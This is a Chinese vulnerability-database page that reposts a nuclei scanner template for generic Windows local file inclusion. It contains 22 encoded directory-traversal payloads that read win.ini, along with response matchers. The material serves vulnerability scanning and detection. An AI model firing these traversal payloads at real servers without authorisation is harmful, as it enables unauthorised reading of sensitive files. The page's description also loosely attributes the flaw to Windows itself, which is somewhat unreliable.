Windows - Local File Inclusion

漏洞信息

漏洞名称: Windows - Local File Inclusion

漏洞类型: 文件读取

漏洞等级: 高危

漏洞描述: Windows操作系统存在本地文件包含漏洞,攻击者可以通过构造特定的URL路径,利用该漏洞读取服务器上的敏感文件,如/windows/win.ini。该漏洞的根源在于Windows系统对URL路径的处理不当,未能正确验证和限制用户输入的路径,导致攻击者可以通过目录遍历技术访问系统上的任意文件。这种漏洞通常发生在Web应用程序中,当应用程序动态包含文件时,没有对用户输入进行严格的过滤和验证。攻击者利用此漏洞可以读取服务器上的敏感信息,如配置文件、密码文件等,严重时可能导致系统被完全控制。由于该漏洞不需要用户认证即可利用,且攻击方式简单,因此被评级为高危漏洞。

产品厂商: Microsoft

产品名称: Windows

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fvulnerabilities%2Fgeneric%2Fgeneric-windows-lfi.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

id: generic-windows-lfi

info:
  name: Windows - Local File Inclusion
  author: mesaglio,sushantkamble,ritikchaddha
  severity: high
  description: |
    Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 22
  tags: azure,windows,lfi,generic

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
        - "/./../../../../../../../../../../windows/win.ini"
        - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
        - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
        - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
        - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
        - "/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
        - "/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
        - "/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
        - "/..///////..////..//////windows/win.ini"
        - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00"
        - "/index.php?page=windows/win.ini"
        - "/index.php?page=windows/win.ini%00"
        - "/index.php?page=../../windows/win.ini"
        - "/index.php?page=....//....//windows/win.ini"
        - "/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini"
        - "/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini"
        - "/../../../../../../../../../windows/win.ini"
        - "/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a00473045022100f043896905a941601641636e7ae4683f2a7ac2d5a48f5f44ef10adbd228927690220230c77284ffee36018ed2d7626d1cb0fff69ddd7b9c87873e8a1e63522c4e651:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件读取
Windows - Local File Inclusion
http://example.com/2025/07/21/github_2211557531/
作者
lianccc
发布于
2025年7月21日
许可协议